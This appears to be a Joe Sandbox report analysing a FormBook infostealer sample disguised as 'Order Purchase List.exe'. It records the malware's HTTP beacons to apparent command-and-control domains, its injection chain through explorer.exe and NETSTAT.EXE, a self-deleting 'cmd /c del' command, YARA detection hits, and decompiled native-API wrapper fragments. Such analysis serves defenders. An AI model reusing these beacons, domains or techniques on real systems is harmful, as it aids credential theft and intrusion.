Oct 8, 2021 11:24:50.715248108 CEST	8.8.8.8	192.168.2.3	0xee59	Server failure (2)	www.iphone13promax.show	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.inatividigitali.com

www.auxiliacapitalpartnersllc.com

www.hottorchlighter.com

www.bigbigsea.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49829	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 8, 2021 11:24:18.630424976 CEST	7336	OUT	GET /gnui/?D81Ltve=MSRjHgM9j7I5HOqdL19ZieQAx0QZYnhjbVtYOT6RDGM9GDKuXhbXwP3ESIufbr/Me9Gt&v0=mjfD3V_ HTTP/1.1 Host: www.inatividigitali.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 8, 2021 11:24:18.744803905 CEST	7337	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 08 Oct 2021 09:24:18 GMT Content-Type: text/html Content-Length: 275 ETag: "615f93b1-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49830	68.178.221.206	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 8, 2021 11:24:23.978734970 CEST	7338	OUT	GET /gnui/?D81Ltve=jxkSMADL8om04CnCt2uvg3koohdaHD/94Z7CDjzCNfrBt1nbgpVJnnhJbuZar5zysKNA&v0=mjfD3V_ HTTP/1.1 Host: www.auxiliacapitalpartnersllc.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 8, 2021 11:24:24.225665092 CEST	7339	IN	HTTP/1.1 200 OK Date: Fri, 08 Oct 2021 09:24:24 GMT Server: Apache X-Powered-By: PHP/7.4.16 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Retry-After: 86400 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 39 37 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 69 73 20 75 6e 64 65 72 20 63 6f 6e 73 74 72 75 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 75 78 69 6c 69 61 63 61 70 69 74 61 6c 70 61 72 74 6e 65 72 73 6c 69 61 2e 63 6f 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 46 72 65 65 20 55 6e 64 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 50 61 67 65 20 70 6c 75 67 69 6e 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 39 30 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 75 78 69 6c 69 61 63 61 70 69 74 61 6c 70 61 72 74 6e 65 72 73 6c 6c 63 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 3f 76 3d 33 2e 38 39 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 75 78 69 6c 69 61 63 61 70 69 74 61 6c 70 61 72 74 6e 65 72 73 6c 6c 63 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 63 6f 6d 6d 6f 6e 2e 63 73 73 3f 76 3d 33 2e 38 39 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 75 78 69 6c 69 61 63 61 70 69 74 61 6c 70 61 72 74 6e 65 72 73 6c 6c 63 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 6d 61 64 5f 64 65 73 69 67 6e 65 72 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 38 39 22 20 74 79 70 65 Data Ascii: 978<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title> is under construction</title> <meta name="description" content="Auxiliacapitalpartnerslia.com" /> <meta name="generator" content="Free UnderConstructionPage plugin for WordPress"> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:400,900"> <link rel="stylesheet" href="http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=3.89" type="text/css"><link rel="stylesheet" href="http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=3.89" type="text/css"><link rel="stylesheet" href="http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/mad_designer/style.css?v=3.89" type
Oct 8, 2021 11:24:24.225699902 CEST	7340	IN	Data Raw: 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 75 78 69 6c 69 61 63 61 70 69 74 61 6c 70 61 72 74 6e 65 72 73 6c 6c 63 2e 63 6f 6d Data Ascii: ="text/css"><link rel="stylesheet" href="http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=3.89" type="text/css"><link rel="icon" sizes="128x128" href="http://www.auxiliacap
Oct 8, 2021 11:24:24.225713015 CEST	7341	IN	Data Raw: 2d 6c 6f 67 69 6e 2e 70 68 70 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 77 6f 72 64 70 72 65 73 73 20 66 61 2d 32 78 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 Data Ascii: -login.php"><i class="fa fa-wordpress fa-2x" aria-hidden="true"></i></a></div> </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49831	104.21.44.253	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 8, 2021 11:24:29.295742035 CEST	7342	OUT	GET /gnui/?D81Ltve=cDQQZHb5+agf8NQlScjGsSnQujRDxgY7AdRX5ePPfv8dvEhK3bFAIhRBnhIsPLeiQwdj&v0=mjfD3V_ HTTP/1.1 Host: www.hottorchlighter.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 8, 2021 11:24:29.325709105 CEST	7343	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 08 Oct 2021 09:24:29 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Fri, 08 Oct 2021 10:24:29 GMT Location: https://www.hottorchlighter.com/gnui/?D81Ltve=cDQQZHb5+agf8NQlScjGsSnQujRDxgY7AdRX5ePPfv8dvEhK3bFAIhRBnhIsPLeiQwdj&v0=mjfD3V_ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wah6xLfjRmYTrDzfmeJVkvFz1biHceIlKPbd5kpj6JT5n2Q4udTZbxQR%2FXb5eXBQVwyW2rbtgl7%2F2IqkcdjMSMWVxI5pL7KqbJXUbs6NzWEjluXpUddQi%2BdJzGFKW9r3MF%2FmEvvQCEE%2Fyg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69ae51032c10698f-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49833	154.23.204.56	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 8, 2021 11:24:34.572302103 CEST	7351	OUT	GET /gnui/?D81Ltve=+ILGKZDievfdlhE08A6+0Ox9ZT8Pbvv5JFHshEbNzSpcbgaG6QnGXyVZrWQJJYTOfSqp&v0=mjfD3V_ HTTP/1.1 Host: www.bigbigsea.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 8, 2021 11:24:34.738827944 CEST	7351	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 08 Oct 2021 09:24:34 GMT Content-Type: text/html Content-Length: 146 Connection: close Set-Cookie: security_session_verify=b916c671982bbc4ddcef9e4fa11e215e; expires=Mon, 11-Oct-21 17:24:34 GMT; path=/; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Order Purchase List.exe PID: 4524 Parent PID: 4248

General

Start time:	11:22:38
Start date:	08/10/2021
Path:	C:\Users\user\Desktop\Order Purchase List.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Order Purchase List.exe'
Imagebase:	0xfb0000
File size:	1104896 bytes
MD5 hash:	903FEBB63C1A5AFA29741401EAC430AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: Order Purchase List.exe PID: 5344 Parent PID: 4524

General

Start time:	11:22:58
Start date:	08/10/2021
Path:	C:\Users\user\Desktop\Order Purchase List.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x9f0000
File size:	1104896 bytes
MD5 hash:	903FEBB63C1A5AFA29741401EAC430AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3352 Parent PID: 5344

General

Start time:	11:23:00
Start date:	08/10/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff720ea0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: NETSTAT.EXE PID: 4856 Parent PID: 3352

General

Start time:	11:23:33
Start date:	08/10/2021
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\NETSTAT.EXE
Imagebase:	0x140000
File size:	32768 bytes
MD5 hash:	4E20FF629119A809BC0E7EE2D18A7FDB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 388 Parent PID: 4856

General

Start time:	11:23:38
Start date:	08/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\Order Purchase List.exe'
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1196 Parent PID: 388

General

Start time:	11:23:38
Start date:	08/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Order Purchase List.exe PID: 5344 Parent PID: 4524 Order Purchase List.exeCOMMON

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3%
Total number of Nodes:	676
Total number of Limit Nodes:	73

Executed Functions

Function 004186A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a41
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
				return _t18;
			}

0x004186a3
0x004186af
0x004186b7
0x004186bc
0x004186e5
0x004186e9

APIs

NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5

Strings

A:A, xrefs: 004186BC, 004186C8

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: A:A
API String ID: 2738559852-2859176346
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B50, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00409B50(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041AF80( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B3A0(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B620( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419730(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b59
0x00409b6c
0x00409b6f
0x00409b74
0x00409b79
0x00409b83
0x00409b88
0x00409b8b
0x00409b8d
0x00409b95
0x00409b9a
0x00409b9a
0x00409ba1
0x00409ba9
0x00409bac
0x00409bae
0x00409bc2
0x00000000
0x00409bc4
0x00409bca
0x00409b7e
0x00409b7e
0x00409b7e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004185EA, Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E004185EA(void* __eax, intOrPtr __ecx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				long _t24;
				void* _t36;

				_push(__eax);
				 *((intOrPtr*)(__eax + 0x553ccac3)) = __ecx;
				_t18 = _v0;
				_t5 = _t18 + 0xc40; // 0xc40
				E004191F0(_t36, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
				_t24 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
				return _t24;
			}

0x004185ea
0x004185eb
0x004185f3
0x004185ff
0x00418607
0x0041863d
0x00418641

APIs

NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: fb6808111876ee8dfa3981f76c5c80453bf94e5c21ac7623d8ebcf22d56ef23f
Instruction ID: 967dc90043ee97e83f2d45023f89719c3bc3e535c2b0ede79da7b63b9724e7ed
Opcode Fuzzy Hash: fb6808111876ee8dfa3981f76c5c80453bf94e5c21ac7623d8ebcf22d56ef23f
Instruction Fuzzy Hash: 2501ABB2215208AFCB08CF88DC95EEB37ADBF8C754F158248FA1D97251C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004185F0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191F0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004185ff
0x00418607
0x0041863d
0x00418641

APIs

NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187CA, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E004187CA(intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32, void* _a1437656308) {
				long _t15;
				void* _t22;

				_pop( *_t1);
				_t11 = _a8;
				_t4 = _t11 + 0xc60; // 0xca0
				E004191F0(_t22, _a8, _t4,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
				return _t15;
			}

0x004187ca
0x004187d3
0x004187df
0x004187e7
0x00418809
0x0041880d

APIs

